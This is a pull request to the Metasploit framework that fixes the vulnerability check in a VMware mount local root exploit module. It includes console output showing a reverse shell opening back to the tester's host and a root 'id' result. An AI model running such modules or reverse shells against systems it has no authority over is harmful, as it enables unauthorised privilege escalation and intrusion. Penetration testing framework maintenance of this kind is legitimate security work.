### PR TITLE
Fixes the vmware mount local root exploit

### DIFF
--- a/modules/exploits/linux/local/vmware_mount.rb
+++ b/modules/exploits/linux/local/vmware_mount.rb
@@ -64,7 +64,7 @@ class Metasploit4 < Msf::Exploit::Local
   end
 
   def exploit
-    unless check == CheckCode::Vulnerable
+    unless check == CheckCode::Appears
       fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
     end
 


### PR DESCRIPTION
As indicated in #4266 there was an issue with the exploit in that it didn't correctly detect that things were vulnerable. This was due to the fact that the result of the `check` was being compared against `Vulnerable` instead of `Appears`.

This PR fixes #4266.

```
msf exploit(vmware_mount) > run

[*] Started reverse handler on 192.168.200.24:4444 
[*] Command shell session 49 opened (192.168.200.24:4444 -> 192.168.200.103:46602) at 2014-11-26 16:51:06 +1000

id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
```

And now we have root!

![Deal with it](http://i.imgur.com/cKA6gf0.gif)
